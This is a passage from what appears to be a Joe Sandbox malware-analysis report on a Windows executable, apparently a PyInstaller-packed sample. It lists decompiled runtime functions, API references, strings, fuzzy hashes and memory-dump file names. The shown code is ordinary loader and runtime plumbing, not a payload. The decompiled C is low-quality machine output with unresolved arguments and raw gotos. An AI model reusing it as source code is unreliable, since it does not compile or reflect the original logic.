				E00007FF77FF7DA8E5E94(_t53, _t55,  &_a24, _t81, _t82);
				goto 0xda8d6512;
				r8d = 0x1000;
				E00007FF77FF7DA8E5298(0, _t36, _t53, _t55,  &_a24,  &_a24, _t53, _t81, _t86);
				if (_t53 != 0) goto 0xda8d652d;
				E00007FF77FF7DA8D2770(_t53, "LOADER: Failed to obtain the absolute path of the runtime-tmpdir.\n",  &_a24, _t86, _t91);
				goto 0xda8d65b0;
				r8d = 0x2000;
				E00007FF77FF7DA8DC170();
				E00007FF77FF7DA8DC6B4(0x5c, _t53, _t91);
				_t79 = _t53;
				if (_t53 == 0) goto 0xda8d65a2;
				asm("o16 nop [eax+eax]");
				E00007FF77FF7DA8E5F18(_t42, _t43,  &_a8216, _t53, _t79, (_t79 - _t53 >> 1) + 1);
				CreateDirectoryW(??, ??);
				_t10 = _t79 + 2; // 0x2
				E00007FF77FF7DA8DC6B4(0x5c, _t10, _t91);
				if (_t53 != 0) goto 0xda8d6560;
				return E00007FF77FF7DA8DACF0(CreateDirectoryW(??, ??), 0, _a16408 ^ _t84);
			}

APIs

Part of subcall function 00007FF7DA8D79A0: MultiByteToWideChar.KERNEL32 ref: 00007FF7DA8D79DA

ExpandEnvironmentStringsW.KERNEL32(00000000,00007FF7DA8D67AF,?,00000000,?,TokenIntegrityLevel), ref: 00007FF7DA8D64BF

Part of subcall function 00007FF7DA8D2770: MessageBoxW.USER32 ref: 00007FF7DA8D2841

Strings

LOADER: Failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF7DA8D64D3
LOADER: Failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF7DA8D6496
LOADER: Failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF7DA8D651A

Memory Dump Source

Source File: 00000001.00000002.330832121.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000001.00000002.330809729.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330933416.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA910000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.331020191.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
String ID: LOADER: Failed to convert runtime-tmpdir to a wide string.$LOADER: Failed to expand environment variables in the runtime-tmpdir.$LOADER: Failed to obtain the absolute path of the runtime-tmpdir.
API String ID: 1662231829-3498232454
Opcode ID: cd5dd1a5472dd457c7a2bf11385e913bd3ab28d4b37e5758f678ec0669c6de24
Instruction ID: 1b3900fb572a1101cbb8a53efb34f724cdde03e97494a1381f1cc6858b207863
Opcode Fuzzy Hash: cd5dd1a5472dd457c7a2bf11385e913bd3ab28d4b37e5758f678ec0669c6de24
Instruction Fuzzy Hash: 6E31A451B2864384FE26B721A9113BDD261BF98780FC80473DE4E42797EE2CE5148720

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8DCE48 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 50%

			E00007FF77FF7DA8DCE48(void* __ecx, long long __rbx, void* __rdx, signed int __rsi, void* __r8, void* __r9) {
				intOrPtr _t61;
				intOrPtr _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				struct HINSTANCE__* _t81;
				long long _t85;
				void* _t89;
				struct HINSTANCE__* _t94;
				long _t97;
				void* _t100;
				signed long long _t101;
				WCHAR* _t104;

				 *((long long*)(_t89 + 8)) = __rbx;
				 *((long long*)(_t89 + 0x10)) = _t85;
				 *((long long*)(_t89 + 0x18)) = __rsi;
				_t101 = _t100 | 0xffffffff;
				_t61 =  *((intOrPtr*)(0x7ff7da8d0000 + 0x4c710 + _t81 * 8));
				if (_t61 == _t101) goto 0xda8dcf77;
				if (_t61 != 0) goto 0xda8dcf79;
				if (__r8 == __r9) goto 0xda8dcf6f;
				_t67 =  *((intOrPtr*)(0x7ff7da8d0000 + 0x4c6f8 + __rsi * 8));
				if (_t67 == 0) goto 0xda8dceba;
				if (_t67 != _t101) goto 0xda8dcf51;
				goto 0xda8dcf25;
				r8d = 0x800;
				LoadLibraryExW(_t104, _t100, _t97);
				_t68 = _t61;
				if (_t61 != 0) goto 0xda8dcf31;
				if (GetLastError() != 0x57) goto 0xda8dcf13;
				_t14 = _t68 + 7; // 0x7
				r8d = _t14;
				if (E00007FF77FF7DA8E9950(__r8) == 0) goto 0xda8dcf13;
				r8d = 0;
				LoadLibraryExW(??, ??, ??);
				if (_t61 != 0) goto 0xda8dcf31;
				 *((intOrPtr*)(0x7ff7da8d0000 + 0x4c6f8 + __rsi * 8)) = _t101;
				goto 0xda8dce98;
				_t21 = 0x7ff7da8d0000 + 0x4c6f8 + __rsi * 8;
				_t65 =  *_t21;
				 *_t21 = _t61;
				if (_t65 == 0) goto 0xda8dcf51;
				FreeLibrary(_t94);
				GetProcAddress(_t81);
				if (_t65 == 0) goto 0xda8dcf6f;
				 *((intOrPtr*)(0x7ff7da8d0000 + 0x4c710 + _t81 * 8)) = _t65;
				goto 0xda8dcf79;
				 *((intOrPtr*)(0x7ff7da8d0000 + 0x4c710 + _t81 * 8)) = _t101;
				return 0;
			}

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FF7DA8DD0FA,?,?,?,00007FF7DA8DCDEC,?,?,00000001,00007FF7DA8DCA09), ref: 00007FF7DA8DCECD
GetLastError.KERNEL32(?,?,?,00007FF7DA8DD0FA,?,?,?,00007FF7DA8DCDEC,?,?,00000001,00007FF7DA8DCA09), ref: 00007FF7DA8DCEDB
LoadLibraryExW.KERNEL32(?,?,?,00007FF7DA8DD0FA,?,?,?,00007FF7DA8DCDEC,?,?,00000001,00007FF7DA8DCA09), ref: 00007FF7DA8DCF05
FreeLibrary.KERNEL32(?,?,?,00007FF7DA8DD0FA,?,?,?,00007FF7DA8DCDEC,?,?,00000001,00007FF7DA8DCA09), ref: 00007FF7DA8DCF4B
GetProcAddress.KERNEL32(?,?,?,00007FF7DA8DD0FA,?,?,?,00007FF7DA8DCDEC,?,?,00000001,00007FF7DA8DCA09), ref: 00007FF7DA8DCF57

Strings

api-ms-, xrefs: 00007FF7DA8DCEED

Memory Dump Source

Source File: 00000001.00000002.330832121.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000001.00000002.330809729.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330933416.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA910000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.331020191.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: b1925c37cafe71baed539b1876bc23373fb45261b76e946b888b2af6812d26f2
Instruction ID: f0ced481abc93763e2e58935ba08f2658f2b851d3376a16cf795d6dedd181fca
Opcode Fuzzy Hash: b1925c37cafe71baed539b1876bc23373fb45261b76e946b888b2af6812d26f2
Instruction Fuzzy Hash: F8310661B1AA4299FE13BB12A8005BDE394BF48BA4FDD4576DD2D47382DF7CE4608320

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8D79A0 Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 68COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32 ref: 00007FF7DA8D79DA

Part of subcall function 00007FF7DA8D2620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF7DA8D76B4,?,?,?,?,?,?,?,?,?,?,?,00007FF7DA8D101D), ref: 00007FF7DA8D2654
Part of subcall function 00007FF7DA8D2620: MessageBoxW.USER32 ref: 00007FF7DA8D272C

MultiByteToWideChar.KERNEL32 ref: 00007FF7DA8D7A60

Strings

MultiByteToWideChar, xrefs: 00007FF7DA8D79EE, 00007FF7DA8D7A71
Failed to get wchar_t buffer size., xrefs: 00007FF7DA8D79E7
Out of memory., xrefs: 00007FF7DA8D7A22
Failed to decode wchar_t from UTF-8, xrefs: 00007FF7DA8D7A6A
win32_utils_from_utf8, xrefs: 00007FF7DA8D7A29

Memory Dump Source

Source File: 00000001.00000002.330832121.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000001.00000002.330809729.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330933416.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA910000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.331020191.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLastMessage
String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
API String ID: 3723044601-876015163
Opcode ID: 92c20d544a3da61e5b294facc47a8b8ec1f934979f76716e8c9c135b6086c3a3
Instruction ID: 4ee42b84989f1e7fa71373c33a3489ee2cc6d54337d415c6146055f499a284bc
Opcode Fuzzy Hash: 92c20d544a3da61e5b294facc47a8b8ec1f934979f76716e8c9c135b6086c3a3
Instruction Fuzzy Hash: A5216122B08A4381FB12EB15F40016DE361FB947D4FD84572DE4C87B6AEF6CD6658710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8EA570 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF7DA8F2383,?,?,?,00007FF7DA8ECADC,?,?,00000000,00007FF7DA8E39AF,?,?,?,00007FF7DA8E9263), ref: 00007FF7DA8EA57F
FlsGetValue.KERNEL32(?,?,?,00007FF7DA8F2383,?,?,?,00007FF7DA8ECADC,?,?,00000000,00007FF7DA8E39AF,?,?,?,00007FF7DA8E9263), ref: 00007FF7DA8EA594
FlsSetValue.KERNEL32(?,?,?,00007FF7DA8F2383,?,?,?,00007FF7DA8ECADC,?,?,00000000,00007FF7DA8E39AF,?,?,?,00007FF7DA8E9263), ref: 00007FF7DA8EA5B5
FlsSetValue.KERNEL32(?,?,?,00007FF7DA8F2383,?,?,?,00007FF7DA8ECADC,?,?,00000000,00007FF7DA8E39AF,?,?,?,00007FF7DA8E9263), ref: 00007FF7DA8EA5E2
FlsSetValue.KERNEL32(?,?,?,00007FF7DA8F2383,?,?,?,00007FF7DA8ECADC,?,?,00000000,00007FF7DA8E39AF,?,?,?,00007FF7DA8E9263), ref: 00007FF7DA8EA5F3
FlsSetValue.KERNEL32(?,?,?,00007FF7DA8F2383,?,?,?,00007FF7DA8ECADC,?,?,00000000,00007FF7DA8E39AF,?,?,?,00007FF7DA8E9263), ref: 00007FF7DA8EA604
SetLastError.KERNEL32(?,?,?,00007FF7DA8F2383,?,?,?,00007FF7DA8ECADC,?,?,00000000,00007FF7DA8E39AF,?,?,?,00007FF7DA8E9263), ref: 00007FF7DA8EA61F

Memory Dump Source

Source File: 00000001.00000002.330832121.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000001.00000002.330809729.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330933416.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA910000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.331020191.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: c0d19d33724c3152ba453cbe1b9f784f25c5a42d78ad00f4c78832e376e3f042
Instruction ID: 5f63456b71583ef3aff6cd944f77ea2d5d3eac19fbbe4a74dd8531042abfa870
Opcode Fuzzy Hash: c0d19d33724c3152ba453cbe1b9f784f25c5a42d78ad00f4c78832e376e3f042
Instruction Fuzzy Hash: EE215C60E08202C1FA6AB761558517DE2417F64BB0FC40AB6ED3E47AD7DE2EE5618220

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8F6FBC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FF7DA8F6FED
GetLastError.KERNEL32 ref: 00007FF7DA8F6FF9
CloseHandle.KERNEL32 ref: 00007FF7DA8F7011
CreateFileW.KERNEL32 ref: 00007FF7DA8F703C
WriteConsoleW.KERNEL32 ref: 00007FF7DA8F705B

Strings

CONOUT$, xrefs: 00007FF7DA8F701D

Memory Dump Source

Source File: 00000001.00000002.330832121.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000001.00000002.330809729.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330933416.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA910000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.331020191.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: f4124709c7c31d5de308cd59126671bcd46a61d9362fadabbe7fbbd0d2697edd
Instruction ID: e1b7652dedd7bd3204d68097532ef3e51691d90434d21077f63cb91e90bd4d8f
Opcode Fuzzy Hash: f4124709c7c31d5de308cd59126671bcd46a61d9362fadabbe7fbbd0d2697edd
Instruction Fuzzy Hash: 9611AC22A18A4386F751AB02E85432DF3A0BB98FE4FC00276EE5D87795DF3CD8648754

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFCFD866488 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 109stringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFCFDA93728
strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFCFDA93796
strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFCFDA937C1

Strings

ASN1:, xrefs: 00007FFCFDA937B4
critical,, xrefs: 00007FFCFDA93721
DER:, xrefs: 00007FFCFDA93789

Memory Dump Source

Source File: 00000001.00000002.331776617.00007FFCFD861000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFCFD860000, based on PE: true

Associated: 00000001.00000002.331752717.00007FFCFD860000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD86D000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD8C5000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD8D9000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD8E9000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD8FD000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFDAAC000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDAAE000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDAD9000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDB0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDB30000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDB56000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333064516.00007FFCFDB7E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333088610.00007FFCFDB84000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333101050.00007FFCFDB86000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333101050.00007FFCFDBA2000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333101050.00007FFCFDBA6000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffcfd860000_4Vp6Xc8SFr.jbxd

Similarity

API ID: strncmp
String ID: ASN1:$DER:$critical,
API String ID: 1114863663-369496153
Opcode ID: d8eae108aa50e8ee9f405d161ab28d2f521657fe406e3845ac9384fbb0e87803
Instruction ID: 62937451cdc388b0ad24d2a6e01695a5f31a53df35f67ff9ec37aa27dff0e59e
Opcode Fuzzy Hash: d8eae108aa50e8ee9f405d161ab28d2f521657fe406e3845ac9384fbb0e87803
Instruction Fuzzy Hash: 7B41D652B18AAA01FB51AB26A92033AA6A1BF15BD4F045030ED7D47BD5FE3CE404C7F5

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFCFD864DF4 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 108stringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFCFDA93247

Strings

ASN1:, xrefs: 00007FFCFDA932D4
critical,, xrefs: 00007FFCFDA93240
DER:, xrefs: 00007FFCFDA932A9

Memory Dump Source

Source File: 00000001.00000002.331776617.00007FFCFD861000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFCFD860000, based on PE: true

Associated: 00000001.00000002.331752717.00007FFCFD860000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD86D000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD8C5000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD8D9000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD8E9000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD8FD000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFDAAC000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDAAE000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDAD9000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDB0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDB30000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDB56000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333064516.00007FFCFDB7E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333088610.00007FFCFDB84000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333101050.00007FFCFDB86000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333101050.00007FFCFDBA2000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333101050.00007FFCFDBA6000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffcfd860000_4Vp6Xc8SFr.jbxd

Similarity

API ID: strncmp
String ID: ASN1:$DER:$critical,
API String ID: 1114863663-369496153
Opcode ID: 5f78d842faca65497d7e082e34e1eaa76c99826f4a218ee81ef128562e321c64
Instruction ID: 0077df3899f77c2415c12a3119f089f4843ade6188bd3602e53f301cba5cb9a4
Opcode Fuzzy Hash: 5f78d842faca65497d7e082e34e1eaa76c99826f4a218ee81ef128562e321c64
Instruction Fuzzy Hash: 74411822B18AAA41EB106F25A82037AA6A0BB14BD4F445130DD7E47BD5FE3CD404C7F5

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8EA6E8 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF7DA8E439D,?,?,?,?,00007FF7DA8EDCF7,?,?,00000000,00007FF7DA8EA806,?,?,?), ref: 00007FF7DA8EA6F7
FlsSetValue.KERNEL32(?,?,?,00007FF7DA8E439D,?,?,?,?,00007FF7DA8EDCF7,?,?,00000000,00007FF7DA8EA806,?,?,?), ref: 00007FF7DA8EA72D
FlsSetValue.KERNEL32(?,?,?,00007FF7DA8E439D,?,?,?,?,00007FF7DA8EDCF7,?,?,00000000,00007FF7DA8EA806,?,?,?), ref: 00007FF7DA8EA75A
FlsSetValue.KERNEL32(?,?,?,00007FF7DA8E439D,?,?,?,?,00007FF7DA8EDCF7,?,?,00000000,00007FF7DA8EA806,?,?,?), ref: 00007FF7DA8EA76B
FlsSetValue.KERNEL32(?,?,?,00007FF7DA8E439D,?,?,?,?,00007FF7DA8EDCF7,?,?,00000000,00007FF7DA8EA806,?,?,?), ref: 00007FF7DA8EA77C
SetLastError.KERNEL32(?,?,?,00007FF7DA8E439D,?,?,?,?,00007FF7DA8EDCF7,?,?,00000000,00007FF7DA8EA806,?,?,?), ref: 00007FF7DA8EA797

Memory Dump Source

Source File: 00000001.00000002.330832121.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000001.00000002.330809729.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330933416.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA910000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.331020191.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 289708898f4a2016c82e6da440bc9e283a7299ead69c11a6804787e19b46bdd5
Instruction ID: dbaa6690ce344b50398efa717dee32f171f72c75cb6f435dcfa3d106402fa939
Opcode Fuzzy Hash: 289708898f4a2016c82e6da440bc9e283a7299ead69c11a6804787e19b46bdd5
Instruction Fuzzy Hash: 40118064F08202C1F65AB7215A4013DE2917FA4BB0FC44AB6ED7E477C7DD2DA5658220

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8DE3C4 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 162
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E00007FF77FF7DA8DE3C4(void* __ecx, void* __esi, long long __rbx, intOrPtr* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* __r8, void* __r9, void* _a8, void* _a16, void* _a24, void* _a32, signed int* _a40, char _a48, signed int _a56, signed int _a64) {
				signed int _v32;
				long long _v40;
				char _v48;
				signed int* _v56;
				void* _t55;
				intOrPtr _t60;
				signed int _t102;
				void* _t110;
				intOrPtr _t112;
				signed int* _t116;
				intOrPtr* _t137;
				void* _t140;
				void* _t143;
				void* _t145;
				void* _t159;
				void* _t160;

				_t110 = _t145;
				 *((long long*)(_t110 + 8)) = __rbx;
				 *((long long*)(_t110 + 0x10)) = __rbp;
				 *((long long*)(_t110 + 0x18)) = __rsi;
				 *((long long*)(_t110 + 0x20)) = __rdi;
				_t137 = __rcx;
				_t140 = __r9;
				_t160 = __r8;
				_t143 = __rdx;
				E00007FF77FF7DA8DCC24(_t55, __r8);
				E00007FF77FF7DA8DCC80(_t110);
				_t116 = _a40;
				if ( *((intOrPtr*)(_t110 + 0x40)) != 0) goto 0xda8de446;
				if ( *__rcx == 0xe06d7363) goto 0xda8de446;
				if ( *__rcx != 0x80000029) goto 0xda8de42a;
				if ( *((intOrPtr*)(__rcx + 0x18)) != 0xf) goto 0xda8de42e;
				if ( *((long long*)(__rcx + 0x60)) == 0x19930520) goto 0xda8de446;
				if ( *__rcx == 0x80000026) goto 0xda8de446;
				if (( *_t116 & 0x1fffffff) - 0x19930522 < 0) goto 0xda8de446;
				if ((_t116[9] & 0x00000001) != 0) goto 0xda8de5d5;
				if (( *(__rcx + 4) & 0x00000066) == 0) goto 0xda8de4de;
				if (_t116[1] == 0) goto 0xda8de5d5;
				if (_a48 != 0) goto 0xda8de5d5;
				if (( *(__rcx + 4) & 0x00000020) == 0) goto 0xda8de4cb;
				if ( *__rcx != 0x80000026) goto 0xda8de4a9;
				_t60 = E00007FF77FF7DA8DD794(_t116, __r9,  *((intOrPtr*)(__r9 + 0x20)), __r9);
				if (_t60 - 0xffffffff < 0) goto 0xda8de5f5;
				if (_t60 - _t116[1] >= 0) goto 0xda8de5f5;
				r9d = _t60;
				E00007FF77FF7DA8DE964(_t110, _t143, __r9, _t116);
				goto 0xda8de5d5;
				if ( *_t137 != 0x80000029) goto 0xda8de4cb;
				r9d =  *((intOrPtr*)(_t137 + 0x38));
				if (r9d - 0xffffffff < 0) goto 0xda8de5f5;
				if (r9d - _t116[1] >= 0) goto 0xda8de5f5;
				goto 0xda8de499;
				E00007FF77FF7DA8DD20C(r9d - _t116[1], _t110, _t116, __r9, __r9, _t116);
				goto 0xda8de5d5;
				if (_t116[3] != 0) goto 0xda8de526;
				if (( *_t116 & 0x1fffffff) - 0x19930521 < 0) goto 0xda8de506;
				_t102 = _t116[8];
				if (_t102 == 0) goto 0xda8de506;
				E00007FF77FF7DA8DD610(_t110);
				if (_t102 != 0) goto 0xda8de526;
				if (( *_t116 & 0x1fffffff) - 0x19930522 < 0) goto 0xda8de5d5;
				if ((_t116[9] >> 0x00000002 & 0x00000001) == 0) goto 0xda8de5d5;
				if ( *_t137 != 0xe06d7363) goto 0xda8de59c;
				if ( *((intOrPtr*)(_t137 + 0x18)) - 3 < 0) goto 0xda8de59c;
				if ( *((intOrPtr*)(_t137 + 0x20)) - 0x19930522 <= 0) goto 0xda8de59c;
				_t112 =  *((intOrPtr*)(_t137 + 0x30));
				if ( *((intOrPtr*)(_t112 + 8)) == 0) goto 0xda8de59c;
				E00007FF77FF7DA8DD624(_t112);
				if (_t112 +  *((intOrPtr*)( *((intOrPtr*)(_t137 + 0x30)) + 8)) == 0) goto 0xda8de59c;
				_v32 = _a64 & 0x000000ff;
				_v40 = _a56;
				_v48 = _a48;
				_v56 = _t116;
				 *0xda8fa428(_t159);
				goto 0xda8de5da;
				_v32 = _a56;
				_v40 = _a48;
				_v48 = _a64;
				_v56 = _t116;
				E00007FF77FF7DA8DDB90(_a64 & 0x000000ff, 0x80000026, __esi, _t137, _t143, _t160, _t140, _t112 +  *((intOrPtr*)( *((intOrPtr*)(_t137 + 0x30)) + 8)));
				return 1;
			}

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF7DA8DE3EC
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FF7DA8DE4D4
__std_exception_copy.LIBVCRUNTIME ref: 00007FF7DA8DE620

Strings

csm, xrefs: 00007FF7DA8DE40E
csm, xrefs: 00007FF7DA8DE526

Memory Dump Source

Source File: 00000001.00000002.330832121.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

